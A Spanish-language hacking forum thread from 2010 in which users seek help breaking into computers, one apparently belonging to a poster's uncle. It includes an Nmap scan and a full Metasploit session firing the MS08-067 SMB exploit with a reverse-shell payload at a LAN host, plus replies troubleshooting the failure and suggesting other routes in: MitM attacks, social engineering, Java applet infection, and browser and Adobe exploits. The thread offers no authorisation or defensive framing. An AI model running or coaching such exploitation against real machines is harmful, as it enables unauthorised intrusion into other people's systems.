Ayuda Nmap y Metasploit

Iniciado por cpu2, 3 Enero 2010, 18:19 PM

0 Miembros y 1 Visitante están viendo este tema.

cpu2

Como es posible si NMAP me dice que es vulnerable a eso -.-
¿alguna idea? jaja

buena rockernalult me a pasao lo mismo que en la imagen jeje

Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.

Un saludo

Shell Root

Cita de: cpu2 en  7 Enero 2010, 20:44 PMComo es posible si NMAP me dice que es vulnerable a eso -.-

A ver Nmap te lanzo el puerto 6551/tcp bittorrent-tracker, No?
Ok, dentro de los parametros de ejecucion del Exploit windows/smb/ms08_067_netapi, necesitas que esta abierto el puerto 445. Alguna duda, es simple... xD

Cita de: cpu2 en  7 Enero 2010, 20:44 PMShell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.
No te rindas... ;) . Nada es Imposible...

Saludos!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

rockernault

CitarNo tiene nada que ver, mira.

es cierto...  :laugh:




neuronass

haber si alguien me ayuda...

escaneo:
CitarStarting Nmap 5.00 ( http://nmap.org ) at 2010-02-21 23:21 ART
Interesting ports on 192.168.1.100:                           
Not shown: 996 filtered ports                                 
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1025/tcp open   NFS-or-IIS
2869/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds

haber si allguein me pude ayudar..
Citar
____________                                                                                                                                                   
< metasploit >                                                                                                                                                   
------------                                                                                                                                                   
       \   ,__,                                                                                                                                                 
        \  (oo)____                                                                                                                                             
           (__)    )\                                                                                                                                           
              ||--|| *                                                                                                                                           
                                                                                                                                                                 

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 524 exploits - 246 auxiliary           
+ -- --=[ 193 payloads - 23 encoders - 8 nops     
       =[ svn r8578 updated today (2010.02.21)   

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100
RHOST => 192.168.1.100                               
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp                               
msf exploit(ms08_067_netapi) > show options                         

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.100    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address                   
   LPORT     4444             yes       The local port                     


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set LHOST 192.168.1.102
LHOST => 192.168.1.102                               
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.100    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.1.102    yes       The local address                   
   LPORT     4444             yes       The local port                     


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on 192.168.1.102:4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Triggering the vulnerability...
  • Exploit completed, but no session was created.


togueter

A ver cpu2, por lo que se ve el ordenador de tu tio es vulnerable, busca por ahí si el bittorrent tiene alguna vulnerabilidad. Que esté el puerto de bittorrent abierto no quiere decir que puedas entrar por ahí. Seguramente tb tendrá parcheado el fallo de ms08_067netapi, por eso no te pirula el exploit; así que no hay na que rascar. Buscate otro metodo.

Shell Root

Que tal neuronass, veo que esta OPEN el microsoft-ds, pero para estár aun más seguros, intentad escanearlo con el Nessus!




togueter, WTF!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

rockernault

Citartogueter, WTF!

eso de plano es no saber..... +1




tragantras

yo creo que el problema es que veis todo bajo el mismo punto de vista:

-Escaneo host en busca de puertos abiertos / servicios vulnerables
-Metasploit hace el resto por mi...

Qué pasa? que cuando queda parcheado un fallo TYPICAL pues se acaba el juego... hay mil cosas que pueds hacer, para empezar si un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas ), prueba con ingeniería social... algun tipo de java applet infection ( hay varios posts en este foro sobre ello ), prueba con las 3333 vulnerabilidades que han salido recientemente en productos Adobe ( acrobat reader ) o con las de iexplore ( aurora ) o con las de Firefox... hay muchos caminos y restringirse tan solo al metasploit es lo peor que pueds hacer.

un saludo!
Colaboraciones:
1 2

togueter

...por eso he puesto "buscate otro metodo" refiriendome a que busque otra forma q no sea usar ese exploit.
si me he equivocado lo siento, no hace falta ser groseros, llevo poco tiempo en esto.

rockernault

Citarsi un host está descargando desde el bittorrent, quizá sea vulnerable a ataques MitM que te permitan modificar los paquetes ( aunque este tipo de técnicas suelen ser complicadas

que opinas Shell Root??